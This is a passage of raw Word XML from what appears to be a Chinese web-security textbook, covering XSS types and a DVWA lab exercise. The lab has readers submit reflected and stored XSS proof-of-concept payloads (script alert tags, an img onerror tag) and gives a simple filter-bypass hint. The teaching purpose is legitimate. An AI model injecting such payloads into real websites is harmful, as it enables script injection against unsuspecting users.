              <w:t xml:space="preserve">论坛帖子内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">反射型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">攻击者构造的</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">是（服务器回显参数）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">搜索词回显、错误信息</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">DOM </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">仅存在于客户端</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> DOM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">不一定（payload</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">可能只由客户端处理）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">从</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">location.hash</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">取数据写入</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">innerHTML</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">攻击载荷的教学最小形态</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（非武器化）：本书后续实战中使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;alert('XSS')&lt;/script&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;img src=x onerror=alert(1)&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等弹窗作为漏洞存在的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">概念证明</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，目的在于确认脚本是否可以执行，而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">不提供</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">窃取</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Cookie、劫持会话、钓鱼页面挂载等完整攻击链。掌握最小证明后，读者应立刻转向防御手段的学习。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">⚔️ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">靶机实操单元：DVWA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> XSS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">关（回指</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Ch2）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本单元使用极低门槛的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">DVWA（Damn</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Vulnerable Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Application）靶场。请确认</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DVWA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">已按第二章指引部署并设为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">low</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">安全级别。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">① </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">目标</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：理解反射型和存储型</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> XSS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的根本差异，亲自构造</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">验证脚本执行。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">② </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">逐步操作与预期现象</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（所有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">IP/路径均为占位符，实际值因环境而异）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">步骤</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">1——反射型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">XSS（Reflected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">XSS）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">DVWA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">左侧菜单进入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“XSS reflected”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。你将在输入框中看到提示。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在文本框输入以下最简单的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">并提交：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;alert('Reflected XSS')&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">预期</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：页面刷新后，浏览器会弹出对话框，显示</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“Reflected XSS”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。这证明用户输入被原样嵌入响应</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTML </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">而未做任何编码。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">若未弹窗，检查输入是否被</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> URL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">编码多此一举（例如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Burp Suite </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">可见），或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DVWA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等级是否实为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">low</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">步骤</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">2——存储型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">XSS（Stored</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">XSS）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">菜单进入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“XSS stored”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。页面模拟留言板。在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“Message”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">字段输入：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;alert('Stored XSS')&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">名字随意填写。点击</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“Sign Guestbook”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">预期</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：提交后页面立即刷新显示留言，并且</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">每次</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">访问该页面（包括其他用户或刷新）都会弹出</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“Stored XSS”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。恶意脚本已存入数据库中。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">② </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">排错</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">脚本被显示为纯文本而不执行：检查</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DVWA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是否为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">low</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，高安全等级下此类简单</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">通常已被过滤。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">medium</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">级别，可以尝试大小写变换或使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;img src=x onerror=alert(1)&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">绕过简单的黑名单。注意这仍然是教学演示，不能用于生产环境绕过。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">③ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Burp Suite </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">观察反射过程</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">开启</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Burp Suite </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">代理拦截，再次提交反射</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> XSS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">payload，在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">响应中查找回显的脚本片段未被编码，加深对数据流经过程的理解（见第八章</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Burp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">基本操作）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">④ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">常见问题的排错</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">浏览器内置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> XSS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">过滤器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：Chrome</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等曾内置</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> XSS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Auditor（现已移除），若浏览器不弹窗，尝试使用其他浏览器或确认靶场响应头中未设置</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">X-XSS-Protection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">JavaScript </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">被注释或截断</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：调试时使用浏览器</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DevTools Console </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">查看是否有语法错误；payload</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中注意闭合引号。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">WAF/IPS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">干扰</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在授权实验环境中应关闭防火墙或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">WAF；实际靶场如</w:t>
